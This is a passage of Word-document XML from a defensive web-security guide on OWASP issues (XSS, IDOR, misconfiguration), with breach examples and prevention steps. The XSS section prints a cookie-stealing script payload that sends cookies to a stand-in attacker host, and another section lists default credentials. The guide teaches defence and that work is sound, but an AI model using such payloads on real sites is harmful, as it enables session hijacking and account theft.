      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement account lockout after a defined number of failed login attempts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Set session tokens to expire after inactivity and invalidate them on logout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 3: Cross-Site Scripting (XSS) — A03:2021</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">What is it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Scripting (XSS) occurs when an attacker manages to inject malicious JavaScript code into a web page that is then viewed by other users. The victim's browser executes the malicious script, believing it to be legitimate content from the trusted website.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Think of it as a graffiti artist writing fake instructions on a bank's official notice board — customers who read and follow those instructions get tricked because they trust the board's location.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How Does an Attacker Exploit It?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">There are three main types of XSS attacks:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored XSS — attacker submits malicious script in a form (comment, profile name) that gets saved in the database and runs every time any user views that content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected XSS — attacker crafts a malicious URL and tricks a victim into clicking it; the script runs once from the server's response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DOM-based XSS — the attack happens entirely in the browser using JavaScript that modifies the page's Document Object Model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A common payload looks like: &lt;script&gt;document.location='http://attacker.com?c='+document.cookie&lt;/script&gt; — this steals the victim's session cookie and sends it to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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40"/>
        <w:gridCol w:w="7920"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="2E6DA4" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Breach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:shd w:fill="FDECEA" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">British Airways (2018) — XSS-related techniques were used as part of a Magecart attack that injected malicious code into British Airways' payment page. The attack stole credit card details of approximately 500,000 customers over a period of two weeks, resulting in a £20 million fine under GDPR.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prevention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Encode all output — convert special characters like &lt; &gt; ' " to their HTML entity equivalents before displaying</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement a strong Content Security Policy (CSP) header to restrict which scripts can run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate and sanitize all user input — use libraries like DOMPurify for HTML sanitization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Use modern JavaScript frameworks (React, Angular) that automatically escape output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Set the HttpOnly flag on session cookies so JavaScript cannot access them</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 4: Broken Access Control — A01:2021 (IDOR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">What is it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Broken Access Control, specifically Insecure Direct Object Reference (IDOR), occurs when an application uses user-controllable input to access objects (files, database records, user accounts) without properly verifying that the requesting user has permission to access them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Imagine an online banking application where your account URL is /account/12345. If you can simply change the number to /account/12346 and see someone else's bank account — that is an IDOR vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How Does an Attacker Exploit It?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">An attacker logs into a legitimate account and observes patterns in URLs, API calls, or form parameters that reference data objects by predictable IDs (numbers, usernames). They then manipulate these identifiers to access other users' data:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Changing /api/user/1001/profile to /api/user/1002/profile to view another user's data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Modifying order IDs to access other customers' purchase history</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Changing document IDs to access confidential files belonging to other users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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40"/>
        <w:gridCol w:w="7920"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="2E6DA4" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Breach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:shd w:fill="FDECEA" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Optus (Australia, 2022) — A broken access control vulnerability in Optus's API allowed an unauthenticated attacker to access customer records simply by incrementing sequential customer ID numbers in API requests. Over 9.8 million current and former customer records were exposed, including passport and driving licence numbers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prevention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Implement server-side access control checks on every request — never trust client-side controls alone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use indirect object references — map database IDs to random tokens (UUIDs) that cannot be guessed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply the principle of least privilege — users should only access data they own or are authorized to view</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Log all access control failures and alert on suspicious patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Conduct regular automated testing to identify IDOR vulnerabilities before deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 5: Security Misconfiguration — A05:2021</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">What is it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Misconfiguration is one of the most common and preventable vulnerabilities. It occurs when security settings are defined, implemented, or maintained incorrectly — or not at all. This includes leaving default credentials unchanged, exposing unnecessary features, displaying detailed error messages to users, or running outdated software.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">It is like buying a high-security safe but leaving it unlocked because the lock seemed complicated to configure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How Does an Attacker Exploit It?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attackers scan for common misconfigurations using automated tools:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Default credentials — trying admin/admin, admin/password on management panels</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exposed admin panels — finding /admin, /phpmyadmin, /cpanel accessible to the public</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Verbose error messages — stack traces revealing server technology, file paths, and database details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Open cloud storage — S3 buckets or Azure Blob storage left publicly readable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Unnecessary open ports — services running on ports that should be firewall-blocked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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40"/>
        <w:gridCol w:w="7920"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="2E6DA4" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Breach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:shd w:fill="FDECEA" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Capital One (2019) — A misconfigured Web Application Firewall on AWS allowed an attacker to exploit a Server-Side Request Forgery (SSRF) vulnerability and access AWS metadata credentials. Over 100 million customer records were exposed. The breach was caused by a single misconfigured security rule.</w:t>
            </w:r>
          </w:p>
